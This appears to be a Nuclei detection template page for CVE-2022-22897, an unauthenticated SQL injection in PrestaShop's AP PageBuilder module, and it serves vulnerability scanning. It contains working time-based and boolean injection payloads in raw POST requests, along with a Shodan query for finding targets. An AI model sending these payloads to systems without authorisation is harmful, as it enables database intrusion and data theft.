PrestaShop AP Pagebuilder <= 2.4.4 - SQL Injection
ID: CVE-2022-22897
Severity: critical
Author: mastercho
Tags: time-based-sqli,cve,cve2022,packetstorm,prestashop,sqli,unauth,apollotheme
Description
Section titled “Description”A SQL injection vulnerability in the product_all_one_img and image_product parameters of the ApolloTheme AP PageBuilder component through 2.4.4 for PrestaShop allows unauthenticated attackers to exfiltrate database data.
YAML Source
Section titled “YAML Source”id: CVE-2022-22897
info: name: PrestaShop AP Pagebuilder <= 2.4.4 - SQL Injection author: mastercho severity: critical description: | A SQL injection vulnerability in the product_all_one_img and image_product parameters of the ApolloTheme AP PageBuilder component through 2.4.4 for PrestaShop allows unauthenticated attackers to exfiltrate database data. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage. remediation: | Upgrade PrestaShop Ap Pagebuilder to version 2.4.5 or later to mitigate this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2022-22897 - https://packetstormsecurity.com/files/cve/CVE-2022-22897 - https://security.friendsofpresta.org/modules/2023/01/05/appagebuilder.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-22897 cwe-id: CWE-89 epss-score: 0.04685 epss-percentile: 0.91818 cpe: cpe:2.3:a:apollotheme:ap_pagebuilder:*:*:*:*:*:prestashop:*:* metadata: verified: true max-request: 4 vendor: apollotheme product: "ap_pagebuilder" framework: prestashop shodan-query: - "http.component:\"Prestashop\"" - http.component:"prestashop" tags: time-based-sqli,cve,cve2022,packetstorm,prestashop,sqli,unauth,apollotheme
http: - raw: - | GET /modules/appagebuilder/config.xml HTTP/1.1 Host: {{Hostname}} - | @timeout: 20s POST /modules/appagebuilder/apajax.php?rand={{rand_int(0000000000000, 9999999999999)}} HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded Referer: {{RootURL}} X-Requested-With: XMLHttpRequest
leoajax=1&product_one_img=if(now()=sysdate()%2Csleep(6)%2C0) - | @timeout: 20s POST /modules/appagebuilder/apajax.php?rand={{rand_int(0000000000000, 9999999999999)}} HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded Referer: {{RootURL}} X-Requested-With: XMLHttpRequest
leoajax=1&product_one_img=-{{rand_int(0000, 9999)}}) OR 6644=6644-- yMwI - | @timeout: 20s POST /modules/appagebuilder/apajax.php?rand={{rand_int(0000000000000, 9999999999999)}} HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded Referer: {{RootURL}} X-Requested-With: XMLHttpRequest
leoajax=1&product_one_img=-{{rand_int(0000, 9999)}}) OR 6643=6644-- yMwI
host-redirects: true max-redirects: 3 matchers-condition: or matchers: - type: dsl name: time-based dsl: - 'duration_2>=6' - 'status_code_1 == 200 && compare_versions(version, "<= 2.4.4")' condition: and
- type: dsl name: blind-based dsl: - 'status_code_1 == 200 && compare_versions(version, "<= 2.4.4")' - 'contains(body_3, "content") && contains(body_3, "{{Hostname}}")' - '!contains(body_4, "content") && !contains(body_4, "{{Hostname}}")' - 'len(body_3) > 200 && len(body_4) <= 22' condition: and
extractors: - type: regex name: version part: body_1 internal: true group: 1 regex: - "<version>\\s*<!\\[CDATA\\[(.*?)\\]\\]>\\s*<\\/version>"# digest: 4b0a00483046022100e0cb1ebc205282a60c61836a2cf43090f3566c5eb4f363cc66266bf695bedb340221009d2ec2cdf3fcb4a7f3c9f6e6e68166d53dba249eb452fdee804794e0daaad1df:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-22897.yaml"